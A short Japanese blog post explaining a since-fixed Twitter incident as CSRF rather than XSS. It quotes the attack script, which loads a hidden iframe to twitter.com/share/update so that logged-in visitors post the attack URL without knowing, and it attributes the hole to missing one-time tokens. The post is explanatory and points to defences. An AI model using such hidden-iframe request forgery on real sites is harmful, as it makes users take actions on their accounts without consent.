読者です 読者をやめる 読者になる 読者になる

twitterでCSRFがあったらしい

Twitterでまた悪質リンクが横行――解決済み(ITmedia)


記事はXSSタグが付いているが、実際の攻撃はCSRFのようだ。

<script type="text/javascript">
var el1 = document.createElement('iframe');
el1.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" +window.location;
document.getElementsByTagName("body")[0].appendChild(el1);


インラインフレームを仕込んで、ブラウザをhttp://twitter.com/share/updateにアクセスさせてるようです。
これにより、攻撃サイトのURLをユーザー(ログイン済み)に投稿させることに成功してます。


いわゆるワンタイムトークンと言ったhidden領域にパラメーターを仕込んで、リクエストの正当性をチェックする事をしていなかった為、インラインフレームへのアクセスが投稿の引き金に成り得た訳です.


CSRFの対策としては
開発者のための正しいCSRF対策
CSRF対策法と効果
等が参考になるかともいます。